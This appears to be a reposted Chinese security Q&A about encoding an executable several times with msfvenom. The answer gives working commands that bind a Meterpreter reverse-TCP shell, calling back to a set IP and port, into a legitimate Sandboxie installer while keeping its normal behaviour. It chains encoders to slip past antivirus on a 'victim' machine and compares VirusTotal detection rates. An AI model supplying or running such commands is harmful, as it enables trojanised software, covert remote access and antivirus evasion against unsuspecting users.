信息安全 - 使用 MSF venom 对可执行文件进行多次编码 - 吾爱随笔录

使用 MSF venom 对可执行文件进行多次编码

信息安全元数据毒液

2021-09-02 03:13:11

我正在尝试对同一可执行文件进行多次编码，但与语法混淆。

问题：

要编码任何可执行文件，我们可以使用以下语法：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X
LPORT=XXXX -x /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe

现在，我想对其他一些可执行文件/相同文件进行编码；多次使用不同的编码器。
我正在使用的语法：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=XX -x  /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o multiencoded.exe

我发现这个线程然后实现了上述语法。但是它生成的输出文件没有包含的可执行文件。由于第一种语法的输出大小为 19MB，第二种语法的输出大小为 76kB。

所以，我的问题是如何对同一个可执行文件实现多个编码。

1个回答

正如我们所知，编码在逃避 AV 方面没有太大帮助，但在尝试了几件事后我得到了一些有趣的结果，如果我们知道受害者机器上的 AV 名称，我们可以用这种方法试试运气。

方法一：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.163 LPORT=12345 -x /root/Downloads/SandboxieInstall.exe -k -e x86/shikata_ga_nai -i 10 -f exe > encodedsandbox.exe

我使用 Sandboxie 进行此方法，它将 9MB 文件转换为 17.9MB 文件。然后上传到VirusTotal。

从屏幕截图中可以看到，Avast、eScan、ESET 等 AV 能够将其扫描为木马。但是，只有少数 AV 没有检测到它，如下所示。

现在是我在问题中提出的第二种方法，即“使用 MSF 毒液多次编码可执行文件”。最后，我能够实现它并找到了更令人兴奋的结果。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.163 LPORT=12345 -e x86/shikata_ga_nai -i 10 -f raw > eoncode.bin

msfvenom -p - -x /root/Downloads/SandboxieInstall.exe -k -f exe -a x86 --platform windows -e x86/bloxor -i 2 > sanbox.exe < eoncode.bin

语法与我上面在问题中提到的有点不同，但它有效。它生成的最终文件为 17.9MB，仅与前一个文件相同。由于“-k”标志，生成的新文件将与原始软件相同，并且 VirusTotal 的结果与以前相同，但我在尝试实施时成功了。

如果我们从最后一个语法中删除“-k”标志，它将生成 9MB 的 exe 文件，图标将与原始软件相同，即 Sandboxie，但它会失去它的原始功能（打开文件后不会发生任何事情，因为我们删除了“- k" 标志，因为它与原始文件大小相同，所以 ps 图标看起来也可能是相同的人可能运行它）。但是当我将它上传到 VirusTotal 时，发现了一些有趣的结果，如下所示。

这与上述结果正好相反。

其它你可能感兴趣的问题

上一篇Windows 10 中的 USB 指纹扫描仪有哪些安全风险？下一篇OpenVPN 的新 tls-crypt 选项